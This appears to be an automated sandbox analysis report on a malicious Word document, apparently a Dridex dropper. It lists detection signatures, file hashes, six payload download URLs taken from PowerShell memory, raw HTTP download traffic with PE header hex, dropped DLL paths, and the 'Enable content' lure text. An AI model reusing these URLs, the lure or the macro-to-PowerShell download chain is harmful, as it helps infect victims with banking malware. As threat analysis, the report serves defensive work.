Analysis Report Order.802796810.doc

Overview

General Information

Sample Name: Order.802796810.doc
Analysis ID: 339433
MD5: b1c2a32cb28d07acc8b2d65ab2012db8
SHA1: 3ac3123decd86944a576227554edbcbb3d62aa58
SHA256: 6951461b231a0f4f2ee086768d3e5e79b30dd68efd55da80997d73c160e6ddce

Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://mail.kyojinconduits.com/jhgun753.zip Avira URL Cloud: Label: malware
Found malware configuration
Source: 7.2.rundll32.exe.8c0000.1.raw.unpack Malware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 52270", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll ReversingLabs: Detection: 43%
Machine Learning detection for dropped file
Source: C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2089799072.0000000001F40000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: mail.kyojinconduits.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.54.126.36:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.54.126.36:80

Networking:

barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in memory: http://mail.kyojinconduits.com/jhgun753.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in memory: http://accuratebc.gr/e0lw3t.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in memory: http://tumkuv.org.tr/zd8dxb2u.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in memory: http://theworldofjacob.com/cjsomlo.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in memory: http://e-macom.com.br/cl35e0.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in memory: http://legion.seriesnow.website/q33rv2.zip
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 Jan 2021 01:32:51 GMTServer: ApacheLast-Modified: Sun, 03 Jan 2021 06:35:59 GMTAccept-Ranges: bytesContent-Length: 303616Content-Type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 aa e0 fe 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 72 04 00 00 2c 00 00 00 00 00 00 e0 1c 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 63 00 00 c8 00 00 00 00 f0 04 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 68 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 19 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 30 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 0a 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 1c 00 00 00 60 00 00 00 1e 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 35 00 00 50 02 00 00 00 80 00 00 00 04 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 34 00 00 cc 52 04 00 00 90 00 00 00 54 04 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 e8 00 00 00 00 f0 04 00 00 02 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 05 00 00 00 00 05 00 00 06 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jhgun753.zip HTTP/1.1Host: mail.kyojinconduits.comConnection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1A67161-551E-40AF-9919-E039C2A6E74E}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /jhgun753.zip HTTP/1.1Host: mail.kyojinconduits.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: mail.kyojinconduits.com
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in binary or memory: http://accuratebc.gr/e0lw3t.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in binary or memory: http://e-macom.com.br/cl35e0.zip
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in binary or memory: http://legion.seriesnow.website/q33rv2.zip
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2094918402.0000000003CBC000.00000004.00000001.sdmp String found in binary or memory: http://mail.kyojinconduits.com
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096384093.000000001BA82000.00000004.00000001.sdmp String found in binary or memory: http://mail.kyojinconduits.com/jhgun753.zip
Source: powershell.exe, 00000005.00000002.2090150782.00000000023E0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098302975.00000000026C0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in binary or memory: http://theworldofjacob.com/cjsomlo.zip
Source: powershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmp String found in binary or memory: http://tumkuv.org.tr/zd8dxb2u.zip
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2090150782.00000000023E0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098302975.00000000026C0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2089530834.0000000000214000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2089530834.0000000000214000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001CE0 EntryPoint,GetTextCharacterExtra,CreateSolidBrush,IsCharAlphaW,GetOpenClipboardWindow,GetProcessWindowStation,IsWindowUnicode,LoadCursorW,DeleteObject,IsGUIThread,GetFontLanguageInfo,GetSystemPaletteUse,GetWindowTextLengthA,DeleteDC,GetClipboardOwner,DeleteEnhMetaFile,GetMenu,IsCharLowerW,DeleteMetaFile,GetMenuItemCount,ShowCaret,WindowFromDC,CharUpperA,CreateMetaFileW,IsCharAlphaNumericA,GetTextColor,CreateCompatibleDC,GetParent,GetSystemPaletteUse,FlattenPath,EndPath,GdiFlush,DestroyIcon,GdiGetBatchLimit,GetEnhMetaFileW,GetDCBrushColor,CreateMetaFileA,GdiGetBatchLimit,GetDoubleClickTime,GetCapture,GetWindowTextLengthA,ReleaseCapture,GetSystemMetrics,GetKBCodePage,GetEnhMetaFileA,IsMenu,LoadCursorFromFileW,CloseWindowStation,AddFontResourceW,IsMenu,GetShellWindow,GetKeyboardType,IsCharAlphaNumericA,GetSystemMetrics,GetMapMode,SaveDC,GdiFlush,FillPath,CreatePatternBrush,CharUpperW,AbortPath,CreateSolidBrush,GetCaretBlinkTime,AnyPopup,GetMessagePos,GetMessageExtraInfo,GetOpenClipboardWindow,PaintDesktop,CharLowerW,GetDlgCtrlID,GetMenuCheckMarkDimensions,CharLowerW,GetInputState,GetColorSpace,VkKeyScanW,BeginPath,CreateMetaFileA,IsGUIThread,DrawMenuBar,EnumClipboardFormats,GetLayout,ReleaseCapture,CharUpperA,CancelDC,LoadCursorFromFileA,DestroyIcon,DeleteEnhMetaFile,GetClipboardSequenceNumber,WindowFromDC,GetCursor,GetPixelFormat,GetWindowTextLengthW,GetDialogBaseUnits,IsIconic,DestroyWindow,OemKeyScan,GetMapMode,GetInputState,IsCharAlphaNumericA,DestroyMenu,GetDoubleClickTime,GdiFlush,GetKeyboardLayout,IsCharAlphaNumericA,CharUpperA,CharUpperW,GetDCPenColor,DeleteMetaFile,GetClipboardSequenceNumber,SwapBuffers,CreateMetaFileW,IsCharLowerA,GetTextAlign,DestroyMenu,DrawMenuBar,GetFontLanguageInfo,SwapBuffers,IsWindowUnicode,AnyPopup,EndMenu,WidenPath,RealizePalette,GetLastError, 7_2_10001CE0

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" button on the top yellow bar, and then click "Enable content"
Source: Document image extraction number: 0 Screenshot OCR: Enable content"
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5133
Source: unknown Process created: Commandline size = 5032
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5032 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess, 7_2_0029B780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029BA14 NtSetInformationProcess, 7_2_0029BA14
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00925CB0 7_2_00925CB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091E0A0 7_2_0091E0A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0092DCA0 7_2_0092DCA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009250A0 7_2_009250A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00924CA0 7_2_00924CA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0090ACD0 7_2_0090ACD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091A0D0 7_2_0091A0D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009198DA 7_2_009198DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009188C0 7_2_009188C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00918CC0 7_2_00918CC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091D030 7_2_0091D030
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00921020 7_2_00921020
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091C590 7_2_0091C590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091D980 7_2_0091D980
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0092D180 7_2_0092D180
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0090F9A0 7_2_0090F9A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091FDD0 7_2_0091FDD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009289F0 7_2_009289F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009271F0 7_2_009271F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00905150 7_2_00905150
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00901570 7_2_00901570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00917564 7_2_00917564
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091AE80 7_2_0091AE80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00918AB0 7_2_00918AB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00921EB0 7_2_00921EB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009226B0 7_2_009226B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00906AD0 7_2_00906AD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009196D0 7_2_009196D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00923EC0 7_2_00923EC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0092FA10 7_2_0092FA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091B6F0 7_2_0091B6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00918EF0 7_2_00918EF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009262F0 7_2_009262F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091F6E0 7_2_0091F6E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0090CA10 7_2_0090CA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0092FA10 7_2_0092FA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00920220 7_2_00920220
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0092D620 7_2_0092D620
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00921240 7_2_00921240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00909E70 7_2_00909E70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00919E70 7_2_00919E70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091A660 7_2_0091A660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00927660 7_2_00927660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00922E60 7_2_00922E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009183C0 7_2_009183C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00917FC0 7_2_00917FC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00927FC0 7_2_00927FC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009167C8 7_2_009167C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091E3F0 7_2_0091E3F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00929B10 7_2_00929B10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00923B00 7_2_00923B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00921730 7_2_00921730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091BF50 7_2_0091BF50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00915B60 7_2_00915B60
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Order.802796810.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Hcpsclo3w5h, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Order.802796810.doc OLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@10/7@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$der.802796810.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC35E.tmp Jump to behavior
Source: Order.802796810.doc OLE indicator, Word Document stream: true
Source: Order.802796810.doc OLE document summary: title field not present or empty
Source: Order.802796810.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............`........................... .R.......R.....................................#...............................h.......5kU............. Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............`...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......(.......L....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....@.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N...............m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......m...............#.............}..v....0.......0.N.............H.m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j......................#.............}..v............0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j..... #...............#.............}..v....p.......0.N...............m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7...............]..j.....Im...............#.............}..v.....I......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j.....J................#.............}..v.....K......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C...............]..j.....Im...............#.............}..v.....Q......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j.....R................#.............}..v.....S......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O...............]..j.....Im...............#.............}..v.....Y......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j.....Z................#.............}..v.....[......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v.... _......0.N.............hFm.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.......[..................j....._................#.............}..v....X`......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.5.1.............}..v....hd......0.N.............hFm.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j.... e................#.............}..v.....e......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s...............]..j.....Im...............#.............}..v....hl......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j.... m................#.............}..v.....m......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....ht......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... u................#.............}..v.....u......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h|......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... }................#.............}..v.....}......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
